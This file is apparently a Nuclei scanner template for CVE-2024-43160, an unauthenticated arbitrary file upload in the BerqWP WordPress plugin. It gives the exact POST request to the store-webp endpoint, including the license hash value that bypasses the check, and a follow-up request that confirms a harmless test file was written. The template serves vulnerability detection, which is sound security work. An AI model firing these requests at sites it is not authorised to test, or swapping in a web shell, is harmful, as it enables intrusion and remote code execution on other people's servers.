nuclei-templates/http/cves/2024/CVE-2024-43160.yaml

78 lines
2.5 KiB
YAML

id: CVE-2024-43160
info:
name: BerqWP <= 1.7.6 - Arbitrary File Upload
author: s4e-io
severity: critical
description: |
The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
reference:
- https://github.com/KTN1990/CVE-2024-43160
- https://nvd.nist.gov/vuln/detail/CVE-2024-43160
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-176-unauthenticated-arbitrary-file-uplaod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-43160
cwe-id: CWE-434
epss-score: 0.00043
epss-percentile: 0.09608
metadata:
verified: true
max-request: 3
vendor: BerqWP
product: BerqWP
framework: wordpress
publicwww-query: "/wp-content/plugins/searchpro"
tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro
variables:
filename: "{{rand_base(12)}}"
num: "{{rand_int(10000000000, 999999999999999)}}"
flow: |
http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/searchpro")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/optifer/v1/store-webp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
image="{{base64(num)}}"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e
matchers:
- type: dsl
dsl:
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{num}}")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100f1decac743f7bfc96405ad2e615008d405c4d97b5e14dbd3a20db2bfc224c68802205d1d7778ca6d033b68766a0792e6d516ca7ec8dcde69ba99972f121beaa22a30:922c64590222798bb761d5b6d8e72950